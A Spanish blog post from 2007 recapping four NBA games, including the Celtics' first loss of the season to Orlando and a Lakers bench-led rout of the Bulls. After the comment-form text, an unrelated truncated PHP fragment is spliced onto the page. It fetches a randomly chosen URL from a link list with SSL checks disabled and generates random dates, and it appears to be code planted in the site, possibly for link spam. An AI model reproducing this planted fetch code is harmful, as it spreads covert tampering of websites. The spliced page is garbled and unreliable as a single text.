La crónica (18/11/07)

19 de November de 2007 por MagicJohnson32

Se acabó: ya no quedan invictos en la NBA 07-08 tras la primera derrota de Boston. Orlando Magic tuvo el honor de ser el primer equipo en derrotar a los nuevos Celtics. Por su parte, los Warriors parecen haber despertado y anoche se anotaron su segundo triunfo consecutivo tras iniciar la campaña con 0-6. La sorpresa llegó en Sacramento, donde los Pistons encajaron otra derrota. En el último partido de la noche, Lakers pasó por encima de unos tristes Bulls en una segunda mitad demoledora.

Vamos con la crónica de los partidos:

Warriors 106 – Raptors 100

El regreso de Stephen Jackson tras cumplir siete partidos de sanción añadió un recurso más al ya de por sí variado ataque de los Warriors. Jackson lideró con 17 puntos a ocho warriors con 8 o más tantos para superar a los Raptors pese a los 29 puntos, 9 asistencias y 6 rebotes de TJ Ford. Los canadienses pagaron el flojo partido de Bosh y un último cuarto horrible en el que encajaron un 26-12. Calderón aportó 4 puntos y 5 asistencias mientras que Garbajosa no jugó.

Celtics 102 – Magic 104

Premio para Orlando. Los Magic se convirtieron anoche en el primer equipo en derrotar a los Celtics, que cayeron tras 8 triunfos seguidos. La pareja Lewis & Howard (46 puntos) contó con la ayuda de Nelson y Turkoglu (18 y 16 respectivamente) mientras que Pierce fue el mejor del trío estelar de los Celtics con 28 puntos, 6 asistencias y 5 rebotes. Pierce tuvo en sus manos el tiro para mandar el partido a la prórroga después de que los de Boston remontasen 20 puntos pero el balón no entró.

Pistons 95 – Kings 105

De nada sirvió el retorno de Chauncey Billups, los Pistons encajaron una nueva derrota en California, esta vez ante los Kings tras la encajada dos noches antes ante Lakers. Y si Farmar brilló el viernes, otro joven base les sorprendió anoche en el ARCO: Beno Udrih, que empieza a demostrar en los Kings todo lo que no pudo bajo las órdenes de Popovic. 23 puntos, 6 asistencias y 4 rebotes logró el esloveno para liderar a seis jugadores en dobles figuras. Rasheed (17-12) fue el mejor de los Pistons junto a Prince (19-5-3).

Bulls 78 – Lakers 106

Jordan Farmar volvió a hacerlo. Tras su brillante actuación ante los Pistons, el base de apenas 20 años llevó a los Lakers a un nuevo triunfo, esta vez ante unos Bulls que poco pudieron hacer en una segunda parte espectacular por parte de Farmar. El banquillo fue esta vez el factor determinante: al margen de Bryant, ningún otro titular de Lakers alcanzó los 10 puntos. En cambio, todos los suplentes anotaron al menos seis puntos y cinco de ellos lograron diez o más puntos, liderados por los dos más jóvenes, Bynum (14 puntos y 10 rebotes) y Farmar (14 puntos, 8 asistencias, 4 rebotes y 3 robos). Los Lakers lograron 18 puntos seguidos entre el final del tercer cuarto y el inicio del último para sentenciar su victoria. Los Bulls no pudieron contar con Deng y sólo Gordon y Nocioni se salvaron.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>